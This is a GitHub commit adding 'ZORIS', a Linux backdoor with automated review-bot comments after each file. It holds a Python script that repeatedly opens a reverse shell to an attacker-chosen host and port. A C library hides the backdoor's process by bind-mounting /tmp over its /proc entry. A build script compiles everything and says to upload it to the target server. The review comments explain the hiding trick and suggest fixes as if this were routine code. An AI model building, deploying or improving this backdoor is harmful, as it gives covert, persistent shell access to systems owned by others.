Add files via upload
brosck authored Mar 22, 2022
1 parent 3c271af commit 8724bb7
Showing 6 changed files with 197 additions and 0 deletions.
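--- /dev/null
+++ b/Makefile
@@ -0,0 +1,7 @@
+CC = gcc
+
+all:
+$(CC) -fPIC -shared hidden.c -o hidden.so
+
+clean:
+rm *.so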
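--- /dev/null
+++ b/build.sh
@@ -0,0 +1,73 @@
+#!/bin/sh
+
+banner() {
+printf "\033[0;36m
+.
+oN0. .OK:
+,0X0. .kNK.
+.xKKO .:ok0Oxl:lxOOkd:. .dXNd
+:0KKk 'cxk0KXNX0OOKKNNXKOc. .dKWX,
+.o000O: .:dkO00KKXNNX0KKKWNNNNX0x:. .c0KNNo
+.okO0Ox, ..':dkO0KKKKK00KXNNNKKKXXNNWNXK0x:'.. .cOKXKKx.
+.lxO0OkkOOOOO000KKKK000KKNNNWMMWWNKKKXNNXXXXKKKK000NXXKd.
+:xkkO0000KKKK00OOkkkk00KKXNWMWXKK0O000XNNWWNXKKKXXX0c
+;dxxxxkkkO0Okkkxxxkk00KKXWMMWNXXX0OOOO0KXK0OOOOOOk;
+..',;:clxxdocodOOkOKKKXNNNNXKXNX0dldkkkdlc:;,'.
+.;::::;:okOkkO0KKXXXKKKKKKOd;:cll:.
+.:lccccc:::lokk0KKKXXXKKKK0OOollooddd:
+.loolllcc;,:lodk0KKKXXKKKKXXOo:odddxxkkl
+.cc:;'.. .:lodOKKKXKKKKKXKo ..,;cool
+.codk00KKXKKXX0k.
+,cdk0KKNWXKXXO:
+'dkOKKXWMWNXKO.
+ck00O0KKXK0KKX:
+.:oxxxkOkkkxo;
+.,:clc:,.
+\033[0;36m[\033[0;37mZORIS - The hidden hookless backdoor\033[0;36m]
+\033[0;36m[\033[0;37mDeveloped by MrEmpy\033[0;36m]\n\n"
+}
+
+requirements() {
+OS=$(lsb_release -si)
+if [ "$OS" = "Arch" ]; then
+pacman -S python python-pip devtools patchelf locate
+pip install pyinstaller
+pip install staticx
+elif [ "$OS" = "Debian" ]; then
+apt-get install python3 python3-pip build-essential locate -y
+apt install patchelf binutils -y
+pip install pyinstaller
+pip install staticx
+else
+apt-get install python3 python3-pip build-essential locate -y
+apt install patchelf binutils -y
+pip install pyinstaller
+pip install staticx
+fi
+
+}
+
+main() {
+LIBPYTHON=$(locate "libpython" | grep "lib/libpython3.[0-9][0-9].so" -m 1)
+
+printf '\n\033[0;34m[*] \033[0;37mInstalling requirements\n'
+requirements
+printf '\n\033[0;34m[*] \033[0;37mCompiling...\n'
+gcc -fPIC -shared hidden.c -o hidden.so
+pyinstaller --clean --onefile --add-binary="$LIBPYTHON.1.0:." zoris.py
+mv dist bin
+mv hidden.so bin
+rm -rf build zoris.spec __pycache__/ 2>/dev/null
+#mv bin/zoris bin/zoris.tmp
+#staticx bin/zoris.tmp bin/zoris
+#rm bin/zoris.tmp
+printf '\n\n\033[0;32m[+] \033[0;37mSuccessfully compiled! The files are in the bin directory, upload them to the target server and run the zoris binary.\n'
+}
+
+if [[ $EUID -ne 0 ]]; then
+printf "\033[0;34m[*] \033[0;37mPlease run as root"
+banner
+exit
+fi
+main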
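Review bot: The root guard `if [[ $EUID -ne 0 ]]; then` near the end of the script is bash-only syntax while the shebang is `#!/bin/sh`; on a POSIX sh such as dash, which is the default `sh` on the Debian systems the `requirements` branches target, `[[` is not available and `EUID` is not set, so the guard reports an error and falls through to `main` instead of stopping the script. The portable form is `if [ "$(id -u)" -ne 0 ]; then`. Separately, the `elif [ "$OS" = "Debian" ]` branch of `requirements` is line-for-line identical to its `else` fallback and could be folded into it.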
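--- /dev/null
+++ b/hidden.c
@@ -0,0 +1,30 @@
+#include <stdio.h>
+#include <string.h>
+#include <sys/mount.h>
+#include <sys/types.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+int get_pid() {
+pid_t current_pid = getpid();
+char proc_p[6] = "/proc/";
+FILE* pid_file;
+pid_file = fopen("pid.txt", "a");
+fprintf(pid_file, "%s", proc_p);
+fprintf(pid_file, "%lu", current_pid);
+fclose(pid_file);
+return 0;
+}
+
+int mount_pid() {
+FILE* pid_f;
+char pid_str[16];
+pid_f = fopen("pid.txt", "r");
+fscanf(pid_f, "%s", pid_str);
+int mount_result = mount("/tmp", pid_str, "tmpfs", MS_BIND, NULL);
+if (mount_result == 0) {
+return 0;
+} else {
+return 1;
+}
+}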
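Review bot: Neither function carries a comment, and `mount_pid` in particular needs one because its `mount("/tmp", pid_str, "tmpfs", MS_BIND, NULL)` call is easy to misread: with `MS_BIND` the filesystem-type argument is ignored, so the call bind-mounts `/tmp` over the `/proc/<pid>` path that `get_pid` appended to `pid.txt`. I would put `/* Bind-mount /tmp over the /proc/<pid> path read from pid.txt; MS_BIND ignores the "tmpfs" type, and the bind mount is recorded in the mount table like any other mount. */` above `mount_pid` and `/* Append "/proc/<own pid>" to pid.txt in the current working directory. */` above `get_pid`. Both functions open `pid.txt` relative to the working directory and neither checks the `fopen` result before using it, so their behaviour depends on where the caller was started from.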
Binary file added static/x86_64/hidden.so
Binary file added static/x86_64/zoris
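--- /dev/null
+++ b/zoris.py
@@ -0,0 +1,87 @@
+#/usr/bin/env python3
+import socket
+import subprocess
+import os
+import pty
+import random
+import time
+import threading
+from multiprocessing import Process
+from ctypes import *
+import argparse
+
+tempo_sleep = 5
+hidden = CDLL(f'{os.getcwd()}/hidden.so')
+pid = os.getpid() - 1
+
+def banner():
+print("""\033[0;36m
+.
+oN0. .OK:
+,0X0. .kNK.
+.xKKO .:ok0Oxl:lxOOkd:. .dXNd
+:0KKk 'cxk0KXNX0OOKKNNXKOc. .dKWX,
+.o000O: .:dkO00KKXNNX0KKKWNNNNX0x:. .c0KNNo
+.okO0Ox, ..':dkO0KKKKK00KXNNNKKKXXNNWNXK0x:'.. .cOKXKKx.
+.lxO0OkkOOOOO000KKKK000KKNNNWMMWWNKKKXNNXXXXKKKK000NXXKd.
+:xkkO0000KKKK00OOkkkk00KKXNWMWXKK0O000XNNWWNXKKKXXX0c
+;dxxxxkkkO0Okkkxxxkk00KKXWMMWNXXX0OOOO0KXK0OOOOOOk;
+..',;:clxxdocodOOkOKKKXNNNNXKXNX0dldkkkdlc:;,'.
+.;::::;:okOkkO0KKXXXKKKKKKOd;:cll:.
+.:lccccc:::lokk0KKKXXXKKKK0OOollooddd:
+.loolllcc;,:lodk0KKKXXKKKKXXOo:odddxxkkl
+.cc:;'.. .:lodOKKKXKKKKKXKo ..,;cool
+.codk00KKXKKXX0k.
+,cdk0KKNWXKXXO:
+'dkOKKXWMWNXKO.
+ck00O0KKXK0KKX:
+.:oxxxkOkkkxo;
+.,:clc:,.
+\033[0;36m[\033[0;37mZORIS - The hidden hookless backdoor\033[0;36m]
+\033[0;36m[\033[0;37mDeveloped by MrEmpy\033[0;36m]\033[0;37m\n""")
+
+def rev_shell():
+try:
+hidden.get_pid()
+hidden.mount_pid()
+os.remove('pid.txt')
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect((arguments.rhost, int(arguments.rport)))
+os.dup2(s.fileno(),0)
+os.dup2(s.fileno(),1)
+os.dup2(s.fileno(),2)
+pty.spawn('sh')
+
+except:
+return
+
+def main():
+hidden.get_pid()
+hidden.mount_pid()
+open('pid.txt', 'a')
+pid_f = open('pid.txt', 'w')
+pid_f.write('/proc/{}'.format(pid))
+pid_f.close()
+hidden.mount_pid()
+os.remove('pid.txt')
+print('\033[0;32m[+]\033[0;37m Backdoor started')
+while True:
+thread_ids = []
+for i in range(0, 7):
+time.sleep(tempo_sleep)
+new_thread = Process(target=rev_shell)
+new_thread.start()
+thread_ids.append(new_thread)
+
+if __name__ == '__main__':
+if os.geteuid() != 0:
+banner()
+print('\033[0;31m[!]\033[0;37m Please run as root')
+else:
+banner()
+parser = argparse.ArgumentParser()
+parser.add_argument('-rh','--host', action='store', help='Attacker host', dest='rhost', required=True)
+parser.add_argument('-rp','--port', action='store', help='Attacker port', dest='rport', required=True)
+arguments = parser.parse_args()
+main()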
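Review bot: The `open('pid.txt', 'a')` statement at the top of `main` discards its return value, so it only leaks an open file object before the next line reopens the same file with `'w'`; it can be deleted outright. The shebang `#/usr/bin/env python3` on the first line is missing the `!` and is therefore just a comment. In `rev_shell` the bare `except: return` swallows every error, including a failed `s.connect`, and `main` appends each started `Process` to `thread_ids` without ever joining it and replaces the list every seven iterations, so the `while True` loop does nothing more than launch a fresh outbound connection attempt to `arguments.rhost`/`arguments.rport` every `tempo_sleep` seconds for as long as the process runs. `pid = os.getpid() - 1` at module level targets whatever process holds the numerically preceding pid, not the parent; a comment stating what that value is expected to be would help the next reader.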
